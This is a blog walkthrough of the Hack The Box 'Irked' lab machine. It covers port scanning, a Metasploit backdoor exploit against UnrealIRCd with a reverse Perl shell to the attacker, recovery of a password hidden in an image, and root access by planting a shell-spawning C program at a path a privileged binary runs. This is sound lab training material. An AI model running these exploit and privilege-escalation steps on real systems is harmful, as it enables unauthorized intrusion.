Redhalo

Hack the box – Irked machine

New easy box today from Hack The Box: Irked, a Linux machine made by MrAgent a while ago.

Let’s jump in!

Enumeration

For this machine, my usual nmap enumeration command gave incomplete results, so I turned to nmapAutomator, which gave me more details about the Irked machine.

Installation is quite simple:

[email protected]:~/Documents$ git clone https://github.com/21y4d/nmapAutomator.git
Cloning into 'nmapAutomator'...
remote: Enumerating objects: 160, done.
remote: Total 160 (delta 0), reused 0 (delta 0), pack-reused 160
Receiving objects: 100% (160/160), 48.13 KiB | 400.00 KiB/s, done.
Resolving deltas: 100% (49/49), done.
[email protected]:~/Documents$ cd nmapAutomator/
[email protected]:~/Documents/nmapAutomator$ ls
nmapAutomator.sh  README.md
[email protected]:~/Documents/nmapAutomator$ chmod +x nmapAutomator.sh

Then to use it:

./nmapAutomator.sh    
./nmapAutomator.sh 10.1.1.1 All  
./nmapAutomator.sh 10.1.1.1 Basic  
./nmapAutomator.sh 10.1.1.1 Recon  
Quick: Shows all open ports quickly (~15 seconds)
Basic: Runs Quick Scan, then runs a more thorough scan on found ports (~5 minutes)
UDP: Runs "Basic" on UDP ports (~5 minutes)
Full: Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
Vulns: Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
Recon: Runs "Basic" scan "if not yet run", then suggests recon commands "i.e. gobuster, nikto, smbmap" based on the found ports, then prompts to automatically run them
All: Runs all the scans consecutively (~20-30 minutes)

This is the result of a Full scan against the Irked machine:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.75.124 Full

Running a Full scan on 10.129.75.124

Host is likely running Linux



---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-03 11:26 EST
Initiating Parallel DNS resolution of 1 host. at 11:26
Completed Parallel DNS resolution of 1 host. at 11:26, 0.01s elapsed
Initiating Connect Scan at 11:26
Scanning 10.129.75.124 [65535 ports]
Discovered open port 22/tcp on 10.129.75.124
Discovered open port 80/tcp on 10.129.75.124
Discovered open port 111/tcp on 10.129.75.124
Discovered open port 6697/tcp on 10.129.75.124
Discovered open port 42964/tcp on 10.129.75.124
Warning: 10.129.75.124 giving up on port because retransmission cap hit (1).
Connect Scan Timing: About 22.68% done; ETC: 11:29 (0:01:46 remaining)
Connect Scan Timing: About 45.45% done; ETC: 11:29 (0:01:13 remaining)
Discovered open port 8067/tcp on 10.129.75.124
Connect Scan Timing: About 68.25% done; ETC: 11:29 (0:00:42 remaining)
Discovered open port 65534/tcp on 10.129.75.124
Completed Connect Scan at 11:29, 134.37s elapsed (65535 total ports)
Nmap scan report for 10.129.75.124
Host is up (0.031s latency).
Not shown: 64752 closed ports, 776 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
42964/tcp open  unknown
65534/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 134.46 seconds


Making a script scan on all ports
                                                                                                                                                                                                                                           
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-03 11:29 EST
Nmap scan report for 10.129.75.124
Host is up (0.032s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42576/tcp6  status
|   100024  1          42964/tcp   status
|   100024  1          52642/udp   status
|_  100024  1          56422/udp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
42964/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd (Admin email [email protected])
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.48 seconds



---------------------Finished all Nmap scans---------------------
                                                                                                                                                                                                                                           

Completed in 3 minute(s) and 29 second(s)

Looking at the website on port 80, we have a single page with a big logo and the following text: “IRC is almost working!”

Nothing interesting was found with dirbuster or nikto.

OK, so let’s try to connect to the IRC server. I needed an IRC client; I found irssi easy to install and use.

For installation:

[email protected]:~/Documents$ sudo apt-get install irssi
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Suggested packages:
  irssi-scripts
The following NEW packages will be installed:
  irssi
0 upgraded, 1 newly installed, 0 to remove and 986 not upgraded.
Need to get 1,183 kB of archives.
After this operation, 2,919 kB of additional disk space will be used.
Get:1 http://ftp.halifax.rwth-aachen.de/kali kali-rolling/main amd64 irssi amd64 1.2.2-1+b1 [1,183 kB]
Fetched 1,183 kB in 3s (405 kB/s)                                     
Selecting previously unselected package irssi.
(Reading database ... 260119 files and directories currently installed.)
Preparing to unpack .../irssi_1.2.2-1+b1_amd64.deb ...
Unpacking irssi (1.2.2-1+b1) ...
Setting up irssi (1.2.2-1+b1) ...
Processing triggers for kali-menu (2020.3.2) ...
Processing triggers for man-db (2.9.3-2) ...
[email protected]:~/Documents$ 

Then to use it, type the command irssi, which brings up the following screen:

To connect to our server, use the following command:

/connect 10.129.75.124 6697

I am now connected and can see the IRC server version in use: Unreal3.2.8.1

A search with searchsploit showed an exploit available in Metasploit: Backdoor Command Execution

FOOTHOLD

Not many options are needed:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


Don’t forget to set your payload; I used cmd/unix/reverse_perl:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.129.75.124
rhosts => 10.129.75.124
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost tun0
lhost => 10.10.14.105
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697

Then we have our shell:

LATERAL MOVEMENT

With the help of LinPEAS I found that a hidden backup file is readable in the Documents folder of djmardov:

[email protected]:/home/djmardov/Documents$ ls -al
ls -al
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
[email protected]:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
[email protected]:/home/djmardov/Documents$ 

Steganography is very new to me, but it is easy to understand that we need a picture from which to extract something, using the password mentioned above.

I have seen only one picture so far: the big smiley on the website homepage.

So let’s give it a try. I installed stegcracker as follows:

[email protected]:~/Documents$ sudo apt-get install stegcracker
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following additional packages will be installed:
  libmcrypt4 libmhash2 steghide
Suggested packages:
  libmcrypt-dev mcrypt
The following NEW packages will be installed:
  libmcrypt4 libmhash2 stegcracker steghide
0 upgraded, 4 newly installed, 0 to remove and 986 not upgraded.
Need to get 322 kB of archives.
After this operation, 955 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://kali.download/kali kali-rolling/main amd64 libmcrypt4 amd64 2.5.8-3.4+b1 [73.3 kB]
Get:4 http://ftp2.nluug.nl/os/Linux/distr/kali kali-rolling/main amd64 stegcracker all 2.0.9-2 [10.4 kB]
Get:2 http://archive-4.kali.org/kali kali-rolling/main amd64 libmhash2 amd64 0.9.9.9-9 [94.2 kB]
Get:3 http://ftp.acc.umu.se/mirror/kali.org/kali kali-rolling/main amd64 steghide amd64 0.5.1-15 [144 kB]
Fetched 322 kB in 1s (240 kB/s)                                     
Selecting previously unselected package libmcrypt4.
(Reading database ... 260305 files and directories currently installed.)
Preparing to unpack .../libmcrypt4_2.5.8-3.4+b1_amd64.deb ...
Unpacking libmcrypt4 (2.5.8-3.4+b1) ...
Selecting previously unselected package libmhash2:amd64.
Preparing to unpack .../libmhash2_0.9.9.9-9_amd64.deb ...
Unpacking libmhash2:amd64 (0.9.9.9-9) ...
Selecting previously unselected package steghide.
Preparing to unpack .../steghide_0.5.1-15_amd64.deb ...
Unpacking steghide (0.5.1-15) ...
Selecting previously unselected package stegcracker.
Preparing to unpack .../stegcracker_2.0.9-2_all.deb ...
Unpacking stegcracker (2.0.9-2) ...
Setting up libmhash2:amd64 (0.9.9.9-9) ...
Setting up libmcrypt4 (2.5.8-3.4+b1) ...
Setting up steghide (0.5.1-15) ...
Setting up stegcracker (2.0.9-2) ...
Processing triggers for libc-bin (2.30-8) ...
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2020.3.2) ...

Then I downloaded the picture, created a file containing the password discovered above and ran the following command:

[email protected]:~/Documents$ wget http://10.129.75.124/irked.jpg
--2021-01-03 11:59:33--  http://10.129.75.124/irked.jpg
Connecting to 10.129.75.124:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’

irked.jpg                                                  100%[=======================================================================================================================================>]  33.88K  --.-KB/s    in 0.1s

2021-01-03 11:59:33 (334 KB/s) - ‘irked.jpg’ saved [34697/34697]

[email protected]:~/Documents$ echo "UPupDOWNdownLRlrBAbaSSss" > pass.txt
[email protected]:~/Documents$ stegcracker irked.jpg pass.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'irked.jpg' with wordlist 'pass.txt'..
Successfully cracked file with password: UPupDOWNdownLRlrBAbaSSss
Tried 1 passwords
Your file has been written to: irked.jpg.out
UPupDOWNdownLRlrBAbaSSss
[email protected]:~/Documents$ cat irked.jpg.out
Kab6h+m+bbp2J:HG

What I found is actually the password for the djmardov user.

[email protected]:/home/djmardov/Documents$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG

[email protected]:~/Documents$ 

Privilege Escalation

With a new LinPEAS scan I found an unusual binary:

Executing this binary gave the following output:

[email protected]:~/Documents$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-03 11:22 (:0)
sh: 1: /tmp/listusers: not found

The last line looks interesting: the binary tries to run /tmp/listusers, so I may be able to place my own payload at that path and spawn a shell with root permissions.

Let’s give it a try.

I created a file listusers.c with the following contents:

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), getuid() */

int main(){
    /* adopt the real uid we were started with, then hand over to an interactive shell */
    setuid(getuid());
    system("/bin/bash");
    return 0;
}

Then compile the code to the required path and name:

gcc listusers.c -o /tmp/listusers

Then, when I executed /usr/bin/viewuser again, I was finally root!

[email protected]:~/Documents$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-03 11:22 (:0)
djmardov pts/1        2021-01-03 12:14 (10.10.14.105)
[email protected]:~/Documents# whoami
whoami
root